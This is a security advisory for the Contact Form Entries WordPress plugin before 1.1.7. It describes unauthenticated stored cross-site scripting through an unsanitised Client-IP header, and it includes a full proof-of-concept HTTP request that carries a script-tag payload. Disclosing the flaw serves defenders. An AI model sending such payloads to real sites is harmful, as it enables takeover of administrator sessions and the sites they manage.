Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not validate, sanitise and escape the IP address retrieved via headers such as CLIENT-IP and X-FORWARDED-FOR, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against logged in admins viewing the created entry

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1

Accept: application/json, */*;q=0.1

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236

Content-Length: 963

Connection: close

Client-IP: <script>alert(/XSS/)</script>

Cookie: vx_user=61c2ecea43ad6164016458635903967



-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="_wpcf7"



1376

-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="_wpcf7_version"



5.5.3

-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="_wpcf7_locale"



en_US

-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="_wpcf7_unit_tag"



wpcf7-f1376-p1701-o1

-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="_wpcf7_container_post"



1701

-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="_wpcf7_posted_data_hash"



3e8ce0f47face5a3318813e733c3c774

-----------------------------9885500162977152723644841236

Content-Disposition: form-data; name="text-42"



Test

-----------------------------9885500162977152723644841236--